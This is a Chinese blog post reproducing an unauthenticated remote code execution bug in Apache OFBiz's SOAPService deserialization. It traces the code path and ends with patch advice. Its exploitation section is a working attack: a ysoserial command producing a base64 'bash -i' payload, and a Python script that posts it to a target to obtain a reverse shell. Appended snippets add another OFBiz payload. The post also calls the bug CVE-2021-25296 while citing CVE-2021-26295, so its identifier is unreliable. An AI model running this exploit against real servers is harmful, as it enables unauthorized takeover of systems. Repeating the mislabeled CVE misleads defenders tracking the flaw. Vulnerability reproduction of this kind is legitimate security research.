CVE-2021-25296 复现

最新推荐文章于 2024-07-12 09:00:00 发布
最新推荐文章于 2024-07-12 09:00:00 发布
阅读量657 收藏 13
点赞数 18
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJ_12340/article/details/139329375
版权

漏洞描述

名称:Apache OFBiz rmi反序列化漏洞

cve编号:cve-2021-25296

危害:未授权远程命令执行

影响版本:Apache OFBiz < 17.12.06

OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了一整套的开发基于Java的web应用程序的组件和工具,已经正式成为 Apache 的顶级项目。

rmi 是 java 远程方法调用,它能让某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。值得注意的是,rmi 传输过程必然会使用序列化和反序列化,如果使用不当,很容易造成反序列化漏洞。

# 漏洞分析

参考文章:Apache Ofbiz反序列化(CVE-2021-26295)分析

通过分析,触发漏洞的路由为 /webtools/control/SOAPService,SOAPService的EventHandler为SOAPEventHandler,SOAPEventHandler调用了SoapSerializer.deserialize,SoapSerializer.deserialize 又调用了 XmlSerializer.deserialize,该方法获取soap请求Body子节点后又调用了deserializeSingle解析xml,deserializeSingle中发现可以构造特殊的soap请求进入deserializeCustom()

在 deserializeCustom 方法中,如果标签为cus-obj则获取元素内容,并将其传入 getObject 方法中,getObject又调用了 getObjectException 方法

getObjectException 方法代码如下:

public static Object getObjectException(byte[] bytes) throws ClassNotFoundException, IOException {
try(ByteArrayInputStream bis = new ByteArrayInputStream(bytes); 
	SafeObjectInputStream wois = new SafeObjectInputStream(bis)) {
	return wois.readObject();
} 
}

代码中调用了 SafeObjectInputStream 对象的 readObject 进行反序列化,我们知道 SafeObjectInputStream 是重写后的 ObjectInputStream,在 ObjectInputStream 的基础上加了黑白名单过滤,我们来分析一下漏洞修复前的 SafeObjectInputStream 代码与修复后的差距,如下图所示

image.png

className.contains 后是黑黑名单的内容,绿色表示新增,红色表示删除,可以看到,在修复前黑名单的内容只有 org.apache.commons.fileupload,还是可以通过修复后增加的 java.rmi.server 触发漏洞执行命令

# 漏洞利用

使用 ysoserial 生成漏洞利用的 payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME  "bash -c {echo,想要执行的命令的base64编码}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d '\n'

因为命令执行成功也不会有回显,所以下面使用了 反弹 shell 的命令

image.png

将得到的 hex 数据赋给下面 payload 的变量 hex_data

import requests

url = 'http://host:port' + '/webtools/control/SOAPService'

hex_data = "aced000573.......000678"

headers = {
    'Content-Type': 'text/xml'
}

data = f'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
     <test>
        <cus-obj>{hex_data}</cus-obj>
     </test>
</soapenv:Body></soapenv:Envelope>'''

response = requests.post(url, data=data, headers=headers, verify=False, timeout=5)

if 'check your parameters' in response.text:
    print("maybe succeed")
else:
    print("maybe failed")

在 vps 上开启监听,运行脚本,成功获取shell

image.png

# 修复建议

  1. 升级 ofbiz 到版本大于 17.12.06
  2. 仿造官方修复办法,添加黑名单 java.rmi.server
  3. 限制不信任用户对 rmi 服务的访问
蚁景网络安全
关注
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496)
EC_Carrot的博客
07-18 298
漏洞复现 使用ysoserial的CommonsBeanutils1来生成Payload,使用命令生成base64的payload: java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n" 将base64的payload替换并发送以下数据包: POST /webtools/control/xmlrpc HTTP/1.1 Host: your-ip Content-Type: applicati
漏洞复现笔记(CVE-2021-43798)
weixin_72760965的博客
06-14 405
Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。使用vulhub进行环境搭建。
Apache Ofbiz-xmlrpc-反序列化漏洞CVE-2023-49070)
最新发布
看着博客敲代码
07-12 795
Apache OFBiz XML-RPC 反序列化漏洞 是由于 Apache OFBiz 在处理 XML-RPC 请求时存在不安全反序列化操作。攻击者可以绕过权限限制,访问/webtools/control/xmlrpc/接口触发反序列化
Apache OfBiz 反序列化命令执行漏洞
weixin_43567873的博客
03-11 66
Apache OfBiz 反序列化命令执行漏洞
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
03-03
2021年,盐栈遭遇了两个严重的安全漏洞,分别是CVE-2021-25281和CVE-2021-25282。这两个漏洞允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统破坏或被用作进一步攻击的跳板。 **CVE-2021-...
ofbiz11.04调用Webservice客户端
weixin_33775582的博客
03-11 116
为什么80%的码农都做不了架构师?>>> ...
Apache ofbiz RMI远程代码执行漏洞复现(CVE-2021-26295)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-19 1328
OFBiz介绍 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等,OFBiz 已经正式成为 Apache 的顶级项目: Apache OFBiz。 影响版本 apache:ofbiz:
CVE-2021-21166
weixin_48300170的博客
07-14 1339
CVE-2021-21166 Chrome 远程代码执行0 Day 漏洞复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 漏洞简介       在2021年2月11日,微软浏览器漏洞研究团队的研究员 Alison Huffman提交一个0day漏洞。       一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式
Apache OFBiz rmi反序列化漏洞复现CVE-2021-26295)
m0_48520508的博客
04-08 951
0x00简介 Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。 0x01漏洞概述 2021年3月22日 Apache OFBiz官方发
Apache OFBiz rmi反序列化漏洞CVE-2021-26295)复现
玄道的网安博客
03-24 1330
简介 Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 影响版本 apache:ofbiz: <17.12.06 环境搭建 docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz 漏洞复现 构建数据包 POST /webtools/control/SOAPService HTTP/1....
解决springboot整合webservice,使用SOAP Web服务遇到的坑
热门推荐
无形存在的博客
03-29 1万+
记录一下springboot整合webservice遇到的问题: 首先,项目需求是,客户那边希望通过webservice来发送数据到本地的服务器,而在本地是希望使用springboot框架,打成的war包在tomcat中启动服务。所以在这里就准备使用springboot整合webservice来完成这一需求。 在网上找了大部分的资料,大多都是关于用webservice的CXF框架,打成war包...
如何将ofbiz的服务暴露成webservice,并且利用soapui测试
美驴
12-19 201
理解本文之前需要了解以下几个东西: ofbiz的服务定义和实现,webservice的含义和简单理解wsdl文件,soapui的简单使用 1.首先定义一个服务,并且在服务定义中增加一个export为true的属性,这样这个服务就暴露成webservice了 &lt;service engine="java" name="TestSoap" location="com.sunyard.cpsp...
外部系统调用Ofbiz中的服务方法
qepkwwl的博客
11-10 608
Ofbiz默认支持提供Soap的WebService服务。需要在Service的定义文件中,增加属性export=true. 本文将以getAllCategories服务为例,该服务是在Product模块下的servcie-maint.xml中。 首先增加export="true",如下: <service name="getAllCategories" engine="si...
CVE-2021-28041复现
03-13
由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值